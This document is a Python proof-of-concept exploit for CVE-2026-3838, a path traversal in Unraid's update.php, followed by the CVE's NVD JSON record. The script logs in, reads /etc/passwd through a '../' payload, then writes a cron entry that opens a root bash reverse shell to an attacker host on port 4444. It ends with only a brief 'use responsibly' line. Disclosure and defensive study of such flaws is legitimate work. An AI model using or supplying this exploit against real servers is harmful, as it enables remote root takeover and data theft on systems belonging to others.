CVE-2026-3838

# CVE-2026-3838 Unraid Path Traversal RCE PoC # Reference: ZDI-CAN-28951 import requests import urllib3 urllib3.disable_warnings() target = "https://target-unraid-server:443" username = "attacker" password = "password123" session = requests.Session() # Step 1: Authenticate to Unraid login_url = f"{target}/update.php" login_data = { "username": username, "password": password } response = session.post(login_url, data=login_data, verify=False) print(f"Login status: {response.status_code}") # Step 2: Path traversal to read sensitive files # Exploit the lack of path validation in update.php path_traversal_payload = "../../../../etc/passwd" exploit_url = f"{target}/update.php?file={path_traversal_payload}" response = session.get(exploit_url, verify=False) if response.status_code == 200: print("Path traversal successful - /etc/passwd content:") print(response.text[:500]) # Step 3: RCE via writing to cron or startup scripts rce_payload = "../../../../etc/cron.d/malicious" rce_data = { "file": rce_payload, "content": "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/attacker-ip/4444 0>&1'\n" } rce_url = f"{target}/update.php" response = session.post(rce_url, data=rce_data, verify=False) print(f"RCE write status: {response.status_code}") print("\n[!] This PoC demonstrates the vulnerability. Use responsibly and only on authorized systems.")

{"cve": {"id": "CVE-2026-3838", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:52.877", "lastModified": "2026-03-17T14:18:58.587", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unraid Update Request Path Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Unraid. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the update.php file. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-28951."}, {"lang": "es", "value": "Vulnerabilidad de salto de ruta y ejecución remota de código en la solicitud de actualización de Unraid. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de Unraid. La autenticación es necesaria para explotar esta vulnerabilidad.\n\nLa falla específica existe dentro del archivo update.php. El problema se debe a la falta de validación adecuada de una ruta proporcionada por el usuario antes de usarla en operaciones de archivo. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto de root. Fue ZDI-CAN-28951."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:unraid:unraid:7.2.3:*:*:*:*:*:*:*", "matchCriteriaId": "D95356E9-EA87-443B-938B-89188AAB478B"}]}]}], "references": [{"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-171/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}